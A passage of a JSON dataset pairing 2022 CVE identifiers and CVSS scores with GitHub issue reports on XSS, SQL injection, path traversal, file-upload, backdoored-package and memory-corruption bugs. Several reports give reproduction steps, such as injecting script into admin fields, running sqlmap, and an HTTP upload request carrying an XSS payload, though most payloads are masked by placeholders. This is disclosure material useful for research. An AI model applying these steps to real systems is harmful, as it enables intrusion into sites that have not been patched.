        "description": "There are four storage XSS vulnerabilities. Enter the background, click video > server group > add,\u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u670d\u52a1\u5668\u7ec4 >\u6dfb\u52a0\uff0c \u5728\u5730\u5740\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG \u5728\u5907\u6ce8\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u64ad\u653e\u5668 >\u6dfb\u52a0\uff0c \u5728\u5730\u5740\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG \u5728\u5907\u6ce8\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-31303",
        "Issue_Url_old": "https://github.com/maccmspro/maccms10/issues/20",
        "Issue_Url_new": "https://github.com/maccmspro/maccms10/issues/20",
        "Repo_new": "maccmspro/maccms10",
        "Issue_Created_At": "2022-05-18T14:36:01Z",
        "description": "\u540e\u53f0\u670d\u52a1\u5668\u7ec4\u4e2d\u5b58\u5728XSS\u6f0f\u6d1e. \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u670d\u52a1\u5668\u7ec4 >\u6dfb\u52a0\uff0c \u5728\u540d\u79f0\u6846\u63d2\u5165payload1\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u670d\u52a1\u5668\u7ec4\u5730\u5740\u6846\u63d2\u5165payload2\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u6392\u5e8f\u6846\u63d2\u5165payload3\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u63d0\u793a\u6846\u63d2\u5165payload4\uff1a APITAG APITAG alert NUMBERTAG APITAG FILETAG \u70b9\u51fb\u4fdd\u5b58\uff0c\u6210\u529f\u89e6\u53d1XSS\u6f0f\u6d1e FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-31307",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/482",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/482",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-03-02T11:46:11Z",
        "description": "SEGV APITAG in njs_string_offset. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-31313",
        "Issue_Url_old": "https://github.com/rakeshrkz7/as_api_res/issues/1",
        "Issue_Url_new": "https://github.com/rakeshrkz7/as_api_res/issues/1",
        "Repo_new": "rakeshrkz7/as_api_res",
        "Issue_Created_At": "2022-05-17T12:06:02Z",
        "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project in APITAG and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install api res py i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG Your project in APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31325",
        "Issue_Url_old": "https://github.com/ChurchCRM/CRM/issues/6005",
        "Issue_Url_new": "https://github.com/churchcrm/crm/issues/6005",
        "Repo_new": "churchcrm/crm",
        "Issue_Created_At": "2022-05-17T16:53:06Z",
        "description": "SQL Injection vulnerability in APITAG NUMBERTAG ia FILETAG . SQL Injection vulnerability in APITAG NUMBERTAG ia FILETAG . Step to exploit NUMBERTAG Login as admin NUMBERTAG Redirect to profile page and click on APITAG . FILETAG NUMBERTAG Submit APITAG Came\" notes and capture request in Burp Suite. FILETAG NUMBERTAG Save request and run sqlmap for injecting the APITAG parameter: APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-31386",
        "Issue_Url_old": "https://github.com/Fanli2012/nbnbk/issues/5",
        "Issue_Url_new": "https://github.com/fanli2012/nbnbk/issues/5",
        "Repo_new": "fanli2012/nbnbk",
        "Issue_Created_At": "2022-05-19T11:53:11Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31390",
        "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/75",
        "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/75",
        "Repo_new": "cherry-toto/jizhicms",
        "Issue_Created_At": "2022-05-23T02:01:23Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31393",
        "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/76",
        "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/76",
        "Repo_new": "cherry-toto/jizhicms",
        "Issue_Created_At": "2022-05-23T02:11:27Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31501",
        "Issue_Url_old": "https://github.com/github/securitylab/issues/669",
        "Issue_Url_new": "https://github.com/github/securitylab/issues/669",
        "Repo_new": "github/securitylab",
        "Issue_Created_At": "2022-04-28T19:02:52Z",
        "description": "Python : Flask Path Traversal Vulnerability. CVE(s) ID list This is a placeholder issue. I plan on sending bulk PR's to appro NUMBERTAG projects. I will add the CVE once the fixes are merged and identifiers are assigned. All For One submission URLTAG Details TBA Are you planning to discuss this vulnerability submission publicly? APITAG Post, social networks, etc). [X] Yes [ ] No Blog post link _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
        "severity": "CRITICAL",
        "baseScore": 9.3,
        "impactScore": 4.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31506",
        "Issue_Url_old": "https://github.com/cmusatyalab/opendiamond/issues/52",
        "Issue_Url_new": "https://github.com/cmusatyalab/opendiamond/issues/52",
        "Repo_new": "cmusatyalab/opendiamond",
        "Issue_Created_At": "2022-05-03T18:49:15Z",
        "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. Common Vulnerability Scoring System Vector The attack can be carried over the network. A complex non standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
        "severity": "CRITICAL",
        "baseScore": 9.3,
        "impactScore": 4.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31558",
        "Issue_Url_old": "https://github.com/tooxie/shiva-server/issues/189",
        "Issue_Url_new": "https://github.com/tooxie/shiva-server/issues/189",
        "Repo_new": "tooxie/shiva-server",
        "Issue_Created_At": "2022-05-03T12:02:35Z",
        "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. Common Vulnerability Scoring System Vector The attack can be carried over the network. A complex non standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
        "severity": "CRITICAL",
        "baseScore": 9.3,
        "impactScore": 4.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31581",
        "Issue_Url_old": "https://github.com/scorelab/OpenMF/issues/262",
        "Issue_Url_new": "https://github.com/scorelab/openmf/issues/262",
        "Repo_new": "scorelab/openmf",
        "Issue_Created_At": "2022-05-03T12:25:30Z",
        "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. Common Vulnerability Scoring System Vector The attack can be carried over the network. A complex non standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
        "severity": "CRITICAL",
        "baseScore": 9.3,
        "impactScore": 4.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31783",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/1214",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/1214",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2022-05-21T13:15:50Z",
        "description": "FILETAG FILETAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-31796",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/71",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/71",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2022-05-24T03:23:18Z",
        "description": "heap overflow in APITAG There is a heap overflow in APITAG in APITAG reproduce steps NUMBERTAG unzip FILETAG NUMBERTAG compile libjpeg with address sanitizer enabled NUMBERTAG run jpeg ./poc /dev/null poc FILETAG stack trace ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-31830",
        "Issue_Url_old": "https://github.com/fex-team/kityminder/issues/345",
        "Issue_Url_new": "https://github.com/fex-team/kityminder/issues/345",
        "Repo_new": "fex-team/kityminder",
        "Issue_Created_At": "2022-05-25T12:23:32Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31836",
        "Issue_Url_old": "https://github.com/beego/beego/issues/4961",
        "Issue_Url_new": "https://github.com/beego/beego/issues/4961",
        "Repo_new": "beego/beego",
        "Issue_Created_At": "2022-05-23T12:59:50Z",
        "description": "Function APITAG use APITAG to deal with APITAG , which may lead to cross directory risk. . Function APITAG use APITAG to deal with APITAG , which may lead to cross directory risk. poc1: route end with APITAG can use APITAG to cross directory and set evil evil value for APITAG . URLTAG URLTAG For route APITAG , urls below can match, and set APITAG APITAG APITAG APITAG note:./ can repeat any times Test code as below: CODETAG FILETAG poc2: regex route can use APITAG to cross directory and replace wildcard with evil value URLTAG For regex route APITAG ,urls below can match and value of APITAG APITAG can be replaced with evil value. APITAG APITAG APITAG note:./ can repeat any times CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-31943",
        "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/95",
        "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/95",
        "Repo_new": "ming-soft/mcms",
        "Issue_Created_At": "2022-05-27T15:05:46Z",
        "description": "Mcms NUMBERTAG URLTAG \u628a\u6e90\u7801\u8003\u4e0b\u6765\u4e4b\u540e APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u53ef\u4ee5\u4e0a\u4f20zip\uff0c\u53ef\u4ee5\u901a\u8fc7zip\u5305\u542bjsp\u6076\u610f\u6587\u4ef6\u4e0a\u4f20\u4e0a\u53bb \u7136\u540e\u8c03\u7528\u8fd9\u4e2a\u63a5\u53e3\u53bb\u89e3\u6790zip\u5e76\u89e3\u6790\u6811jsp\u5e76\u8bbf\u95ee\u3002 APITAG NUMBERTAG zip APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32065",
        "Issue_Url_old": "https://github.com/yangzongzhuan/RuoYi/issues/118",
        "Issue_Url_new": "https://github.com/yangzongzhuan/ruoyi/issues/118",
        "Repo_new": "yangzongzhuan/ruoyi",
        "Issue_Created_At": "2022-05-15T23:58:57Z",
        "description": "Vulnerability: The html file can be uploaded where the avatar is uploaded, resulting in stored XSS. Vulnerability disclosure Vulnerability title: The html file can be uploaded where the avatar is uploaded, resulting in stored XSS Product: URLTAG Affected Versions NUMBERTAG the lastest vesion) Discovery time: APITAG Found by: solarpeng NUMBERTAG Exploit sence: The System allows multiple users to log in. If a user is granted user management rights, he can insert a malicious xss payload on user management page, so that all users with this permission can access and trigger an xss attack Analysis report NUMBERTAG If you are not Chinese,please change the language into the English through Browser translation plugin such as Google NUMBERTAG After deployment, enter the background management page FILETAG NUMBERTAG Click the avatar into the personal center FILETAG NUMBERTAG Click the \"modify avatar\",and upload a normal image,the click OK button FILETAG FILETAG NUMBERTAG Intercept the request package with a packet capture tool such as burp, change the file suffix to html, and change the content with xss payload such as \" APITAG alert NUMBERTAG APITAG ,then pass the request,and the response shows APITAG means upload success FILETAG FILETAG FILETAG NUMBERTAG Refresh the index page,start burp,and then click the avatar again,the burp will intercept the xss html that we upload FILETAG FILETAG NUMBERTAG Copy the html url,and then send to the other users using Ruoyi cms,if they click,the xss attack is triggered FILETAG POC: POST PATHTAG HTTP NUMBERTAG Host: mysite.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate X Requested With: APITAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Origin: FILETAG Connection: close Referer: URLTAG Cookie: Your cookies NUMBERTAG Content Disposition: form data; name=\"avatarfile\"; APITAG Content Type: image/png APITAG alert NUMBERTAG APITAG NUMBERTAG Fixes: The backend should verify the file suffix, and do not allow html file upload;or check the content in Html file that filter xss payloads.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-32124",
        "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/3",
        "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/3",
        "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
        "Issue_Created_At": "2022-05-30T09:02:33Z",
        "description": "There are multiple reflective XSS vulnerabilities in this website . Vulnerability APITAG XSS Vulnerability APITAG risk Affected version\uff1a Vulnerability APITAG APITAG are some places I found NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1arepeat NUMBERTAG url: URLTAG NUMBERTAG url: URLTAG NUMBERTAG url: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-32200",
        "Issue_Url_old": "https://github.com/davea42/libdwarf-code/issues/116",
        "Issue_Url_new": "https://github.com/davea42/libdwarf-code/issues/116",
        "Repo_new": "davea42/libdwarf-code",
        "Issue_Created_At": "2022-05-26T10:00:03Z",
        "description": "heap overflow in _dwarf_check_string_valid in dwarf_util.c. There is a heap overflow in _dwarf_check_string_valid in dwarf_util.c. Depending on the usage of this library, this may cause code execution or deny of service. reproduce steps NUMBERTAG compile libdwarf with address sanitizer NUMBERTAG run dwarfdump with poc file APITAG poc: FILETAG Address sanitizer output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-32201",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/73",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/73",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2022-05-30T12:33:53Z",
        "description": "null pointer dereference in APITAG in APITAG reproduce steps NUMBERTAG compile libjpeg with address sanitizer NUMBERTAG run APITAG poc FILETAG stack trace ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-32202",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/74",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/74",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2022-05-31T09:21:46Z",
        "description": "null pointer dereference in APITAG in APITAG stack trace ERRORTAG poc: FILETAG reproduce: compile libjpeg with address sanitizer run ./jpeg ./poc /dev/null",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-32298",
        "Issue_Url_old": "https://github.com/landley/toybox/issues/346",
        "Issue_Url_new": "https://github.com/landley/toybox/issues/346",
        "Repo_new": "landley/toybox",
        "Issue_Created_At": "2022-05-23T05:44:46Z",
        "description": "Null pointer dereference in httpd.c. poc APITAG crash scene ERRORTAG Anaylize It seems that he did not deal with the situation that the return value of xabspath was NULL , which led to the subsequent dereferencing of this NULL, and continued to trace the location of the APITAG line. When the judgment here is true, it will be Return NULL. I think this error is a code path that may not be considered. But appearing in the httpd remote service may cause a remote denial of service. discoverer Taolaw MENTIONTAG Team of Vecentek",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32324",
        "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/144",
        "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/144",
        "Repo_new": "kermitt2/pdfalto",
        "Issue_Created_At": "2022-06-01T07:31:05Z",
        "description": "heap buffer overflow found?. sample here: FILETAG Describe info\uff1a $ ./pdfalto PATHTAG PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f1 at pc NUMBERTAG f NUMBERTAG b bp NUMBERTAG fff NUMBERTAG e8f0f0 sp NUMBERTAG fff NUMBERTAG e8e8a0 WRITE of size NUMBERTAG at NUMBERTAG f1 thread T NUMBERTAG f NUMBERTAG a in strncat PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f8cfec7dc NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ca9 in _start ( PATHTAG NUMBERTAG f1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b NUMBERTAG in malloc PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f8cfec7dc NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in strncat Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32325",
        "Issue_Url_old": "https://github.com/tjko/jpegoptim/issues/107",
        "Issue_Url_new": "https://github.com/tjko/jpegoptim/issues/107",
        "Repo_new": "tjko/jpegoptim",
        "Issue_Created_At": "2022-06-02T01:51:47Z",
        "description": "SEGV caused by a READ memory access. hi, with the help of fuzzing ,I found some crash sample in this repo, here is the sample, are they new bugs? crash position APITAG crash sample: APITAG sample here: FILETAG command: ./jpegoptim f all progressive crash_sample APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address (pc NUMBERTAG f NUMBERTAG c NUMBERTAG ca NUMBERTAG bp NUMBERTAG c NUMBERTAG sp NUMBERTAG ffe NUMBERTAG c NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used NUMBERTAG f NUMBERTAG c NUMBERTAG ca NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG cad NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c8e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG c6 in jpeg_consume_input ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG f in jpeg_read_header ( PATHTAG NUMBERTAG f7f0d in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG cf NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING crash position: APITAG crash sample: APITAG sample here: FILETAG 